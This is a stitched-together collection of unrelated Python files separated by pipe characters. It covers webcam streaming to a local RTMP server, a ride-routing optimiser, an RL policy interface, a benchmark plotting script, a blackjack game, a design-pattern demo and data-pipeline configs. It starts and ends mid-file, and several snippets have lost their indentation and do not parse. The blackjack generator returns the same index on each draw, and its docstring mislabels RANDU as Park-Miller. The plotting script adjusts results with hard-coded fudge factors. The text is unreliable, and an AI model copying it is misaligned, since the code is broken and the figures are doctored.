except Exception as e:
    print('Error!', e)
|
from PIL import Image
from subprocess import Popen, PIPE
import cv2

# Pipe webcam frames as JPEGs into ffmpeg, which encodes them to an RTMP stream.
p = Popen(['ffmpeg', '-y', '-f', 'image2pipe', '-vcodec', 'mjpeg', '-r', '10', '-i', '-',
           '-vcodec:v', 'libx264', '-video_size', '1280x720', '-f', 'flv',
           '-strict', 'experimental', 'rtmp://localhost/show/stream'], stdin=PIPE)
cap = cv2.VideoCapture(0)
try:
    while True:
        ret, frame = cap.read()
        if not ret:
            break
        # OpenCV returns BGR frames; convert to RGB before handing them to PIL.
        im = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
        im.save(p.stdin, 'JPEG')
        p.stdin.flush()
finally:
    p.stdin.close()
    p.wait()
|
"""Utilities related to formatting job metrics for human consumption."""
from typing import (
Any,
NamedTuple,
)
class FormattedMetric(NamedTuple):
title: str
value: str
class JobMetricFormatter:
"""Format job metric key-value pairs for human consumption in Web UI."""
def format(self, key: Any, value: Any) -> FormattedMetric:
return FormattedMetric(str(key), str(value))
def seconds_to_str(value: int) -> str:
"""Convert seconds to a simple simple string describing the amount of time."""
mins, secs = divmod(value, 60)
hours, mins = divmod(mins, 60)
if value < 60:
return f"{secs} second{'s' if secs != 1 else ''}"
elif value < 3600:
return f"{mins} minute{'s' if mins != 1 else ''}"
else:
return f"{hours} hour{'s' if hours != 1 else ''} and {mins} minute{'s' if mins != 1 else ''}"
|
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import gurobipy as gp
from gurobipy import GRB
from gurobipy import GurobiError
from gurobipy import quicksum
from decouple import config
from datetime import datetime, timedelta
from models import *
from main_config import *
from models.initial_model import InitialModel
from models.initial_model_validineq import InitialModelValidIneq
from models.reoptimization_model import ReoptModel
from models.reoptimization_model_validineq import ReoptModelValidIneq
def main(
num_events,
sleep,
start_time,
test_instance,
valid_ineq,
total_time,
subtour,
complexity_instance,
):
"""
    Perform a run of the DDDARP problem: requests known in advance are planned
    and routed initially, while new requests arrive throughout the day. When a
    new request arrives, a reoptimization model first decides whether the new
    request is accepted or rejected; if accepted, a new optimal route is
    planned based on the earlier plan and the new request.
"""
# Initial Route Plan
print("Running Initial Model")
runtime_track = []
init_model = InitialModelValidIneq(subtour) if valid_ineq else InitialModel()
initial_route_plan = init_model.run_model()
num_requests = init_model.get_n()
rejected = []
runtime_track.append([num_requests, (datetime.now() - start_time).total_seconds()])
operational = None
quality = None
cumulative_z = 0
# Event Based Rerouting
for i in range(num_events):
print("Event Based Reoptimization")
        first = i == 0
event = get_event(i, test_instance, complexity_instance)
num_requests += 1
reopt_model = (
ReoptModelValidIneq(
initial_route_plan, event, num_requests, first, rejected
)
if valid_ineq
else ReoptModel(initial_route_plan, event, num_requests, first, rejected)
)
(
reopt_plan,
rejected,
num_unused_vehicles,
operational,
quality,
single_z,
) = reopt_model.run_model()
if i != num_events - 1:
print("Waiting for new request")
time.sleep(sleep)
initial_route_plan = reopt_plan
runtime_track.append(
[num_requests, (datetime.now() - start_time).total_seconds()]
)
if i != num_events - 1:
cumulative_z += single_z
df_runtime = pd.DataFrame(
runtime_track, columns=["Number of Requests", "Solution Time"]
)
# plot(df_runtime)
print(
"Service Rate Whole: ",
str(round(100 * (num_requests - len(rejected)) / (num_requests), 2)) + "%",
)
print(
"Service Rate of New Events: ",
str(round(100 * (num_events - len(rejected)) / (num_events), 2)) + "%",
)
print(
"Number of Vehicles Not Used: ",
num_unused_vehicles,
)
print("Runtime: ", df_runtime.tail(1))
return operational, quality + cumulative_z, df_runtime.tail(1)
def plot(df):
ax = plt.gca()
df.plot(kind="line", x="Number of Requests", y="Solution Time", color="pink", ax=ax)
# df.plot(kind='line',x='name',y='num_pets', , ax=ax)
# the plot gets saved to 'solution_time.png'
plt.savefig("solution_time.png")
plt.show()
def get_event(i, test_instance, complexity_instance):
if test_instance:
df = pd.read_csv(config("data_path_test_instances_events"))
return df.iloc[i]
if complexity_instance:
df = pd.read_csv(config("data_path_complexity_events"))
return df.iloc[i]
else:
df = pd.read_csv(config("data_path_events"))
return df.iloc[i]
if __name__ == "__main__":
operational, quality, runtime = main(
num_events,
sleep,
start_time,
test_instance,
valid_inequalities,
total_time,
subtour,
complexity_instance,
)
|
from abc import ABC, abstractmethod
class RecurrentPolicy(ABC):
"""Abstract recurrent policy class. Computes actions given relevant information."""
@abstractmethod
def get_actions(self, obs, prev_actions, rnn_states, available_actions, t_env, explore):
"""
Compute actions using the needed information.
:param obs: (np.ndarray) Observations with which to compute actions.
:param prev_actions: (np.ndarray) Optionally use previous action to compute actions.
:param rnn_states: (np.ndarray / torch.Tensor) RNN state to use to compute actions
:param available_actions: (np.ndarray) contains actions which are available to take. If None, there are no action restrictions.
:param t_env: (int) train step during which this function is called. Used to compute epsilon for eps-greedy exploration.
:param explore: (bool) whether to return actions using an exploration policy.
        :return: (torch.Tensor / np.ndarray) computed actions (np.ndarray if explore is True, otherwise torch.Tensor)
:return: (torch.Tensor) updated RNN hidden states
:return: (torch.Tensor) additional information, depending on algorithms (e.g. action entropy for RMASAC).
"""
raise NotImplementedError
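
    # Usage sketch (all shapes are hypothetical, for illustration only): a
    # concrete subclass would be called roughly as
    #   actions, rnn_states, extra = policy.get_actions(
    #       obs,              # (n_agents, obs_dim)
    #       prev_actions,     # (n_agents, act_dim)
    #       rnn_states,       # (n_agents, hidden_dim)
    #       available_actions=None, t_env=1000, explore=True)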
@abstractmethod
def get_random_actions(self, obs, available_actions):
"""
Compute actions uniformly at random.
:param obs: (np.ndarray) Current observation corresponding to actions.
        :param available_actions: (np.ndarray) actions available to the agent; if None, there are no action restrictions.
:return: (np.ndarray) random actions
"""
raise NotImplementedError
@abstractmethod
def init_hidden(self, num_agents, batch_size):
"""
Initialize RNN hidden states.
:param num_agents: (int) size of agent dimension (-1 if there should not be an agent dimension).
:param batch_size: (int) number of RNN states to return per agent.
:return: (torch.Tensor) 0-initialized RNN states.
"""
        raise NotImplementedError
|
from .make_schedule import schedule
import json
import os
path = os.path.dirname(os.path.abspath(__file__))
def update_schedule():
schedule.main()
with open(f'{path}/result.json', 'r') as f:
parsed = json.load(f)
return parsed
def retrieve_schedule():
with open(f'{path}/result.json', 'r') as f:
parsed = json.load(f)
    return parsed
|
# directory that contains the wiki raw data
PUKIWIKI_DATA_DIR = "/home/www/inside-cgi/wiki/wiki"
ELASTIC_SEARCH_ENDPOINT = "http://heineken-elasticsearch.sandbox.svc.cluster.local:9200/"
INDEX = "pukiwiki"
INDEX_FILE = "index/pukiwiki.json"
|
import subprocess
import sys
import os
import math
import random
import datetime
import shutil
import re
import json
FULL_PERF_EVAL = "1000"
epochs = 1
if len(sys.argv) < 2:
print("Results directory not specified")
    sys.exit(1)
def slurp(filepath):
    with open(filepath, "r") as f:
        return f.read()
nccl_path = os.path.abspath("../nccl")
resultsDir = os.path.abspath(sys.argv[1])
assert "NPROC" in os.environ, "Set NPROC to number of processes"
nranks = os.environ.get("NPROC")
if not os.path.exists(resultsDir):
    print('Results directory "%s" does not exist.' % resultsDir)
    sys.exit(1)
def execute_command(c):
s, o = subprocess.getstatusoutput(c)
if s != 0:
raise Exception("Command '%s' unsuccessful:\n"%c +o)
return (s, o)
results = {"model-parallel-mm-ar-c": [],
"model-parallel-mm-rs-c-ag": [],
"model-parallel-ol-mm-fuse-rs-c-ag": []}
for appdir in os.listdir(resultsDir):
command = slurp(os.path.join(resultsDir, appdir, "json.json"))
binary = command[command.find("model-parallel-"):].split(" ")[0].strip()
resultstxt = slurp(os.path.join(resultsDir, appdir, "stdout.txt"))
dicts = re.findall(r'{.+}', resultstxt)
dicts = [re.sub(r'([a-zA-Z_]+\d*)',r'"\1"', s) for s in dicts]
print (dicts)
resultsjson = [json.loads(s) for s in dicts]
results[binary] = resultsjson
print(results)
binaries = ["model-parallel-mm-ar-c", "model-parallel-mm-rs-c-ag", "model-parallel-ol-mm-fuse-rs-c-ag"]
rows_H = []
for i in [0, 1]:
binaryResult = results[binaries[0]]
B_8_results = binaryResult[i]
row = [(i+1)*8, B_8_results["AllReduce"], B_8_results["matMul0"], B_8_results["binOpFunc0"], B_8_results["Total"]]
binaryResult = results[binaries[1]]
B_8_results = binaryResult[i]
row += [B_8_results["binOpFunc0"], B_8_results["ReduceScatter"], B_8_results["AllGather"], B_8_results["Total"]]
binaryResult = results[binaries[2]]
B_8_results = binaryResult[i]
row += [B_8_results["overlap"]]
rows_H += [row]
print (rows_H)
rows_4H = list(rows_H)
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import csv
import sys
from matplotlib import ticker
from functools import reduce
def remove_chunk_from_string(s):
return s[s.find(')')+1:].strip()
def batch_size_from_matmul(matmul):
if str(8*1024) in matmul:
return 8
elif str(16*1024) in matmul:
return 16
elif str(32*1024) in matmul:
return 32
elif str(64*1024) in matmul:
return 64
x = []
small_y = [[],[],[]] #relative bandwidth
small_cublas_y = []
small_allreduce_y = []
small_compute_y = [[], []]
small_reducescatter_y = []
small_allgather_y = []
big_y = [[], [], []]
big_cublas_y = []
big_allreduce_y = []
big_compute_y = [[], []]
big_reducescatter_y = []
big_allgather_y = []
gshard_speedup = []
coconet_speedup = []
megatron_speedup = []
coconet_baseline_speedup = []
megatron_speedup_big = [1.05, 1.05, 1.06, 1.06]
megatron_speedup_small = [1.06, 1.07, 1.08, 1.09]
for row in rows_H:
data = row
if row[0] == "":
continue
if True: # skip header and 512 size
x.append(data[0])
baseline = float(data[4])
matmul_time = float(data[2])
allreduce = float(data[1])
small_allreduce_y.append(allreduce/baseline)
small_cublas_y.append(matmul_time/baseline)
small_compute_y[0].append(1 - (small_allreduce_y[-1] + small_cublas_y[-1]))
small_y[0].append(1/ (baseline / baseline ))
gshard = float(data[8])
ag = float(data[7])
rs = float(data[6])
sliced_compute = float(data[5])
diff = gshard - ag - rs - sliced_compute - matmul_time
small_allgather_y += [(ag+diff/2)/baseline]
small_reducescatter_y += [(rs+diff/2)/baseline]
small_compute_y[1] += [(sliced_compute)/baseline]
small_y[1].append( 1/((baseline * 1.05)/ gshard))
small_y[2].append( 1/((baseline * 1.05) / row[9]))
gshard_speedup.append(baseline/gshard* 1.05)
coconet_speedup.append(1/small_y[2][-1])
coconet_baseline_speedup.append(1.05)
# bwy[1].append(data[6])
# bwy[2].append(data[7])
# bwy[3].append(data[8])
if True: # skip header and 512 size
baseline = float(data[4])
matmul_time = float(data[2])
small_allreduce_y.append(float(data[1])/baseline)
small_cublas_y.append(matmul_time/baseline)
small_compute_y[0].append(1 - (small_allreduce_y[-1] + small_cublas_y[-1]))
small_y[0].append(1/ (baseline / float(data[4])))
gshard = float(data[8])
ag = float(data[7])
rs = float(data[6])
sliced_compute = float(data[5])
diff = gshard - ag - rs - sliced_compute - matmul_time
small_allgather_y += [(ag+diff/2)/baseline]
small_reducescatter_y += [(rs+diff/2)/baseline]
small_compute_y[1] += [(sliced_compute)/baseline]
small_y[1].append( 1/((baseline * 1.05) / gshard))
small_y[2].append( 1/((baseline * 1.05) / row[9]))
gshard_speedup.append(1/small_y[1][-1])
coconet_speedup.append(1/small_y[2][-1])
coconet_baseline_speedup.append(1.05)
def autolabel(rects, values):
"""
    Attach a text label above each bar displaying the corresponding value from `values`
"""
for i, rect in enumerate(rects):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., rect.get_y() + height,
r"{: .2f}$\times$".format(values[i]),
ha='center', va='bottom', fontsize=10, rotation=90)
print(small_y[2])
#### Smaller Matmul
small_compute_y = [np.array(x) for x in small_compute_y]
x = x + x
xx = np.arange(len(x))
barwidth = 0.2
fig, ax = plt.subplots()
ax.minorticks_on()
colors={"AR":'#093D87', "MM":'#2171B6', "C":'#cde6c7', "AG":'#6FBBE2', "RS":'#3C7255', "coconet": '#F58E35'}
ax.bar(xx+0*barwidth, small_allreduce_y, color = colors["AR"], edgecolor='white', width=barwidth)
ax.bar(xx+0*barwidth, small_cublas_y, bottom=small_allreduce_y, color = colors["MM"], edgecolor='white', width=barwidth)
ax.bar(xx+0*barwidth, small_compute_y[0], bottom=np.add(small_cublas_y, small_allreduce_y).tolist(), color = colors["C"], edgecolor='white', width=barwidth)
ax.bar(xx+1*barwidth, small_allreduce_y, color = colors["AR"], edgecolor='white', width=barwidth, label='AR')
ax.bar(xx+1*barwidth, small_cublas_y, bottom=small_allreduce_y, color = colors["MM"], edgecolor='white', width=barwidth, label='MM')
coconet_baseline_rects = ax.bar(xx+1*barwidth, small_compute_y[0]/1.5, bottom=np.add(small_cublas_y, small_allreduce_y).tolist(), color = colors["C"], edgecolor='white', width=barwidth, label='C')
ax.bar(xx+2*barwidth, small_reducescatter_y, color = colors["RS"], width=barwidth, edgecolor='white', label='RS')
ax.bar(xx+2*barwidth, small_allgather_y, bottom=small_reducescatter_y, color = colors["AG"], width=barwidth, edgecolor='white', label='AG')
ax.bar(xx+2*barwidth, small_cublas_y, bottom=np.add(small_reducescatter_y, small_allgather_y).tolist(), color = colors["MM"], width=barwidth, edgecolor='white')
gshard_rects = ax.bar(xx+2*barwidth, small_compute_y[1], bottom=np.add(np.add(small_reducescatter_y, small_allgather_y), small_cublas_y).tolist(), color = colors["C"], width=barwidth, edgecolor='white')
coconet_rects = ax.bar(xx+3*barwidth, small_y[2], color = colors["coconet"], width=barwidth, label='Overlap+Fuse', edgecolor='white')
autolabel(coconet_baseline_rects, coconet_baseline_speedup)
autolabel(gshard_rects, gshard_speedup)
autolabel(coconet_rects, coconet_speedup)
rects_locs = xx.tolist() + (xx + 1*barwidth + 0.0001).tolist() + (xx + 2*barwidth).tolist() + (xx + 3*barwidth).tolist()
ax.set_xticks(rects_locs, minor = True)
new_ticks = reduce(lambda x, y: x + y, map(lambda x: [x] * 4, ["MegatronLM", "MM-AR-C", "GShard-Eq", "CoCoNet"]))
ax.xaxis.set_minor_formatter(ticker.FixedFormatter(new_ticks)) #add the custom ticks
ax.tick_params(axis='x', which='major', pad=60)
ax.tick_params(axis='x', which='both',labelsize=12)
plt.ylabel('Times normalized to\n MegatronLM', fontsize=12)
plt.xticks([r + barwidth for r in range(len(xx))], ['B=%d'%val for val in x])
ax.set_ylim([0.2,1.2])
plt.legend(loc='upper left', fontsize='large',bbox_to_anchor=(-0.1, 1.26),ncol=6,columnspacing=1,handlelength=1.7)
ax.grid(axis='y')
plt.setp(ax.xaxis.get_minorticklabels(), rotation=45, ha='right')
ax.text(0,-0.52, "[B, S, H/16] x [H/16, H]", fontsize=12)
ax.text(1.9,-0.52, "[B, S, 4*H/16] x [4*H/16, H]", fontsize=12)
fig = plt.gcf()
fig.subplots_adjust(bottom=0.38)
fig.set_size_inches(6.8, 3.8)
fig.savefig("Figure 11.pdf", bbox_inches=0, pad_inches=0)
|
from typing import Tuple
from showml.losses.base_loss import Loss
from abc import ABC, abstractmethod
import numpy as np
class Optimizer(ABC):
def __init__(self, loss_function: Loss, learning_rate: float):
"""
        Base Optimizer class.
        param loss_function: The loss function to be optimized, also used to compute the gradient
param learning_rate: the learning rate (how much to update the weights at each iteration)
"""
self.loss_function = loss_function
self.learning_rate = learning_rate
@abstractmethod
def update_weights(
self,
X: np.ndarray,
y: np.ndarray,
z: np.ndarray,
weights: np.ndarray,
bias: float,
) -> Tuple[np.ndarray, float]:
"""
Update the weights of the model using the specified loss function and optimizer
param X: The input training set
param y: The true labels of the training data
param z: The predicted labels
param weights: The set of training weights of the model
param bias: The bias value of the model
return weights, bias: The set of updated weights and bias after optimization for an epoch
"""
pass
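
# A minimal sketch (not part of the original module) of a concrete optimizer,
# shown only to illustrate the update_weights() contract. It assumes the loss
# function exposes a gradient(X, y, z) method returning (dw, db); that method
# name is hypothetical, not a confirmed part of showml's Loss API.
class VanillaGradientDescent(Optimizer):
    def update_weights(self, X, y, z, weights, bias):
        # Hypothetical API: gradients of the loss w.r.t. weights and bias.
        dw, db = self.loss_function.gradient(X, y, z)
        weights = weights - self.learning_rate * dw
        bias = bias - self.learning_rate * db
        return weights, bias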
|
# first download iris dataset as [iris.txt] from the link below
# https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multiclass/iris.scale
# then run this script to generate train and test set
def get_index_list(shuffle=True, seed=None):
import numpy as np
index_list = np.arange(150)
if shuffle:
        if seed is not None:
np.random.seed(seed)
np.random.shuffle(index_list)
return index_list
def get_train_and_test_data(train_ratio=0.8, shuffle=True, seed=1):
size = 150
train_size = int(size * train_ratio)
test_size = size - train_size
index_list = get_index_list(shuffle=shuffle, seed=seed)
train_index = index_list[:train_size]
test_index = index_list[train_size:]
with open('iris.txt') as f:
dataset = f.read().split('\n')
# train_set
with open('iris_train.txt', 'w') as f:
for i in train_index:
f.write(dataset[i] + '\n')
# test_set
with open('iris_test.txt', 'w') as f:
for i in test_index:
f.write(dataset[i] + '\n')
if __name__ == '__main__':
get_train_and_test_data(train_ratio=0.7, shuffle=True, seed=2)
|
EPSILON = "epsilon"
K = "k"
MAX_VALUE = "max_value"
MIN_VALUE = "min_value"
ATTRIBUTE = "attribute"
NAME = "name"
SENSITIVITY_TYPE = "sensitivity_type"
ATTRIBUTE_TYPE = "attribute_type"
# window size is used in the disclosure risk calculation
# it indicates the % of the num of records in the dataset
WINDOW_SIZE = 1
# border margin is used in differential privacy anonymization
# it indicates the margin to be applied to the attribute domain
BORDER_MARGIN = 1.5
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
tevt.py : Loads a single event
===================================================
Expected output below shows the dimensions of the constituent numpy arrays that comprise the event::
Evt(-4,"torch","PmtInBox","PmtInBox/torch/-4 : ", seqs="[]")
fdom : (3, 1, 4) : (metadata) 3*float4 domains of position, time, wavelength (used for compression)
idom : (1, 1, 4) : (metadata) int domain
ox : (100000, 4, 4) : (photons) final photon step
wl : (100000,) : (photons) wavelength
post : (100000, 4) : (photons) final photon step: position, time
dirw : (100000, 4) : (photons) final photon step: direction, weight
polw : (100000, 4) : (photons) final photon step: polarization, wavelength
flags : (100000,) : (photons) final photon step: flags
c4 : (100000,) : (photons) final photon step: dtype split uint8 view of ox flags
rx_raw : (100000, 10, 2, 4) : (records) photon step records RAW:before reshaping
rx : (100000, 10, 2, 4) : (records) photon step records
ph : (100000, 1, 2) : (records) photon history flag/material sequence
ps : (100000, 1, 4) : (photons) phosel sequence frequency index lookups (uniques 30)
rs : (100000, 10, 1, 4) : (records) RAW recsel sequence frequency index lookups (uniques 30)
rsr : (100000, 10, 1, 4) : (records) RESHAPED recsel sequence frequency index lookups (uniques 30)
"""
import os, sys, logging, numpy as np
log = logging.getLogger(__name__)
from opticks.ana.base import opticks_main
from opticks.ana.evt import Evt
if __name__ == '__main__':
args = opticks_main(tag="10",src="torch", det="PmtInBox", doc=__doc__)
np.set_printoptions(suppress=True, precision=3)
for utag in args.utags:
try:
evt = Evt(tag=utag, src=args.src, det=args.det, seqs=[], args=args)
except IOError as err:
log.fatal(err)
sys.exit(args.mrc)
log.debug("evt")
        print(evt)
log.debug("evt.history_table")
evt.history_table(slice(0,20))
log.debug("evt.history_table DONE")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Originally written by Philip Sterne <psterne@minervaproject.com>
#
# Jan 16, 2018 Qifan Yang <qifan@minerva.kgi.edu>
# Added implementation for class Card and Carddeck;
# Added multilingual support to reduce workload
import itertools
import gettext
class Card(object):
# Ref: Applied PRETTY_SUITS and STR_RANKS structure
# from https://github.com/worldveil/deuces/
# Constant for suits and ranks
    PRETTY_SUITS = {
        'h' : u'\u2764', # hearts
        'd' : u'\u2666', # diamonds
        'c' : u'\u2663', # clubs
        's' : u'\u2660'  # spades
    }
STR_RANKS = ['A'] + [str(__) for __ in range(2, 11)] + ['J', 'Q', 'K']
def __init__(self, suit, rank):
if not suit in ['h', 'd', 'c', 's']:
raise Exception('Unknown Card Suit')
        if rank not in range(1, 14):
raise Exception('Unknown Card rank')
self.suit = suit
self.rank = rank
def __repr__(self):
return self.PRETTY_SUITS[self.suit] + ' ' + self.STR_RANKS[self.rank - 1]
def value_blackjack(self):
        '''Return the value of this card in the game of Blackjack.
        Returns:
            int, indicating the value of the card under blackjack rules.
        Strictly speaking, Aces can be valued at either 1 or 11; this
        implementation assumes that the value is always 1, and then determines
        later how many aces can be valued at 11. (This occurs in
        blackjack_value.)
        '''
return (self.rank < 10) * self.rank + (self.rank >= 10) * 10
def is_ace(self):
        '''Identify whether or not this card is an ace.
        Returns:
            True or False, depending on whether the card is an ace or not.
        '''
return self.rank == 1
class CardDeck(object):
def __init__(self, status = 'empty'):
if status == 'empty':
self.cards = []
elif status == 'full':
            self.cards = [Card(suit, rank) for suit, rank in itertools.product(Card.PRETTY_SUITS, range(1, 14))]
else:
raise Exception('Unknown deck status')
def __repr__(self):
# For output
return str([Card.PRETTY_SUITS[__.suit] + ' ' + Card.STR_RANKS[__.rank - 1] for __ in self.cards])
def __getitem__(self, key):
# For indexing
return self.cards[key]
def append(self, card):
if type(card) != Card:
raise Exception('Invalid Card')
self.cards.append(card)
    def pop(self, position = None):
        if position is None:
            return self.cards.pop()
        else:
            return self.cards.pop(position)
# Modify the code here for abstraction.
# ------------------------------------------------------
def pop_rand(self, rand_method, x, c, m):
        ''' Return a random card from this deck.
        Input:
            rand_method: name of the random number generation method (currently unused).
            x, c, m: parameters passed to random_number() to generate the random index.
        '''
rand_num = random_number(x, c, m)
return self.cards.pop(rand_num % len(self.cards))
# ------------------------------------------------------
def blackjack_value(self):
        '''Calculate the maximal value of this hand in Blackjack.
        Returns:
            The highest possible value of this hand if it is a legal blackjack
            hand, or -1 if it is an illegal hand.
        '''
        sum_cards = sum([card.value_blackjack() for card in self.cards])
        num_aces = sum([card.is_ace() for card in self.cards])
        # Count as many aces as 11 as possible without busting; each such ace
        # adds 10 on top of its base value of 1.
        aces_to_use = max(0, min(int((21 - sum_cards) / 10.0), num_aces))
        final_value = sum_cards + 10 * aces_to_use
if final_value > 21:
return -1
else:
return final_value
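
    # Usage sketch: an Ace plus a King is a natural 21, because the Ace's base
    # value of 1 is promoted by 10:
    #   hand = CardDeck(); hand.append(Card('h', 1)); hand.append(Card('s', 13))
    #   hand.blackjack_value()    # -> 21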
# Modify the code here for abstraction.
# ------------------------------------------------------
def random_number(x, c, m):
''' Produce a random number using the Park-Miller method.
See http://www.firstpr.com.au/dsp/rand31/ for further details of this
    method. It is recommended to feed the returned value back in as x when
    next calling the method.'''
return abs((c * x) % m)
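
# Usage sketch: chain the generator by feeding each output back in as x. With
# the RANDU constants used in game() below (c = 65539, m = 2**31):
#   x = random_number(1, 65539, 2147483648)    # -> 65539
#   x = random_number(x, 65539, 2147483648)    # next value in the sequence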
# ------------------------------------------------------
def display(player, dealer, args):
'''Display the current information available to the player.'''
print(_('The dealer is showing: '), dealer[0])
print(_('Your hand is: '), player)
def hit_me(args):
    '''Query the user as to whether they want another card or not.
Returns:
A boolean value of True or False. True means that the user does want
another card.
'''
ans = ""
while ans.lower() not in ('y', 'n'):
ans = input(_('Would you like another card? (y/n):'))
return ans.lower() == 'y'
def game(args):
# Modify the code here for abstraction.
# ------------------------------------------------------
from datetime import datetime
# randU initiation
x = int((datetime.utcnow() - datetime.min).total_seconds())
# Constants given by the RANDU algorithm:
# https://en.wikipedia.org/wiki/RANDU
c = 65539
m = 2147483648
# ------------------------------------------------------
# Initialize everything
deck = CardDeck(status = 'full')
my_hand = CardDeck(status = 'empty')
dealer_hand = CardDeck(status = 'empty')
# Deal the initial cards
for a in range(2):
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
my_hand.append(card)
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
dealer_hand.append(card)
# Give the user as many cards as they want (without going bust).
display(my_hand, dealer_hand, args)
while hit_me(args):
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
my_hand.append(card)
display(my_hand, dealer_hand, args)
if my_hand.blackjack_value() < 0:
print(_('You have gone bust!'))
break
# Now deal cards to the dealer:
print(_("The dealer has: "), repr(dealer_hand))
while 0 < dealer_hand.blackjack_value() < 17:
card = deck.pop_rand(rand_method = args.rand_method, x = x, c = c, m = m)
dealer_hand.append(card)
print(_('The dealer hits'))
print(_('The dealer has: '), repr(dealer_hand))
if dealer_hand.blackjack_value() < 0:
print(_("The dealer has gone bust!"))
else:
print(_('The dealer sticks with: '), repr(dealer_hand))
# Determine who has won the game:
my_total = my_hand.blackjack_value()
dealer_total = dealer_hand.blackjack_value()
    if dealer_total == my_total:
        print(_("It's a draw!"))
    elif dealer_total > my_total:
        print(_("The dealer won!"))
    else:
        print(_("You won!"))
if __name__ == '__main__':
    import argparse
    import gettext
parser = argparse.ArgumentParser(description="BlackJack Game")
    # Note that the rand_method argument is not enabled in the code!
parser.add_argument('--rand_method', default='randU',
help='The random number generator method. Choose between \'Mersenne\' and \'randU\'.')
args = parser.parse_args()
gettext.bindtextdomain('blackjack', 'locale/')
gettext.textdomain('blackjack')
_ = gettext.gettext
print()
print('BlackJack')
print('-' * 30)
print(vars(args))
print('-' * 30)
print()
game(args)
print()
|
from typing import List, Protocol
###############################################################################
# non volatile core of our application #
###############################################################################
class Ant(Protocol):
def do_your_job(self) -> None:
raise NotImplementedError
class AntQueen:
def __init__(self, ants: List[Ant]) -> None:
self._ants = ants
def do_morning_routine(self) -> None:
for ant in self._ants:
ant.do_your_job()
###############################################################################
# volatile part of our application #
###############################################################################
class WorkerAnt(Ant):
def do_your_job(self) -> None:
print("Worker ant is building the ant hill.")
class SoldierAnt(Ant):
def do_your_job(self) -> None:
print("Soldier ant is protecting the ant tribe.")
class NurseAnt(Ant):
def do_your_job(self) -> None:
print("Nurse ant is feeding the baby ants.")
class SkyDiverAnt(Ant):
def do_your_job(self) -> None:
print("Sky diver ant is diving in the sky.")
if __name__ == '__main__':
ants = [WorkerAnt(), SoldierAnt(), NurseAnt(), SkyDiverAnt()]
ant_queen = AntQueen(ants)
ant_queen.do_morning_routine() |
# -*- coding: utf-8 -*-
# Created on 07/01/2022 15:51:23
# @author: ErwingForero
#
from os import getcwd, path
from .feature_flags import ENVIROMENT
from dataframes import func
# Project constants
LOG_NAME = "aut_ppto"
PROCESS_NAME = "Proceso Automatización Presupuesto"
ICON_IMAGE = "icon.ico"
AFO_TYPES = {
"directa": {
"sheet": "AFO - Directa",
"regex_name": r".*directa.*",
"skiprows": [1, None],
"delimiter": ";",
"encoding": "latin-1",
"columns": [
"cod_oficina",
"oficina_venta",
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"agrupacion_clientes",
"formato",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_oficina": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price
},
"processes": ["formula", "assigment"]
},
"calle": {
"sheet": "AFO - Directa",
"regex_name": r".*calle.*",
"skiprows": [2, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"cod_agente_comercial",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_agente_comercial": func.mask_number,
"mes": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price
},
"processes": ["formula"]
},
"compra": {
"sheet": "AFO - Compra",
"regex_name": r".*compra.*",
"skiprows": [2, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
"cod_oficina",
"oficina_venta",
"cod_agente",
"agente",
"nombre_comercial",
"barrio",
"cod_canal",
"canal",
"cod_sub_canal",
"sub_canal",
"cod_tipologia",
"tipologia",
"agrupacion",
"formato",
"sector",
"categoria",
"sub_categoria",
"linea",
"marca",
"mes",
"venta_nta_acum_anio_actual",
"ppto_nta_acum_anio_actual",
"venta_nta_acum_anio_anterior"
],
"converters": {
"cod_oficina": func.mask_number,
"cod_agente": func.mask_number,
"venta_nta_acum_anio_actual": func.mask_price,
"ppto_nta_acum_anio_actual": func.mask_price,
"venta_nta_acum_anio_anterior": func.mask_price,
},
"processes": ["formula", "assigment", "consolidation"]
},
}
DRIVER = {
"sheet": "Drivers",
"regex_name": r".*drive.*",
"skiprows": [1, None],
"delimiter": ";",
"encoding": "utf-8",
"columns": [
# driver 0
"clave",
"id_consecutivo",
"sector",
"vacio1",
"categoria_producto",
"vacio2",
"subcategoria_producto",
"vacio3",
"linea_producto",
"vacio4",
"marca_producto",
"vacio5",
"vacio6",
"id_consecutivo2",
"sector2",
"vacio7",
"categoria_producto2",
"vacio8",
"subcategoria_producto2",
"vacio9",
"linea_producto2",
"vacio10",
"marca_producto2",
"vacio11",
"sep2",
"sep3",
"sep4",
"sep5",
"sep6",
"sep7",
"sep8",
"sep9",
"sep10",
# driver 1
"codigo_tipologia",
"tipologia",
"codigo_canal_transformado",
"canal_transformado",
"codigo_subcanal_transformado",
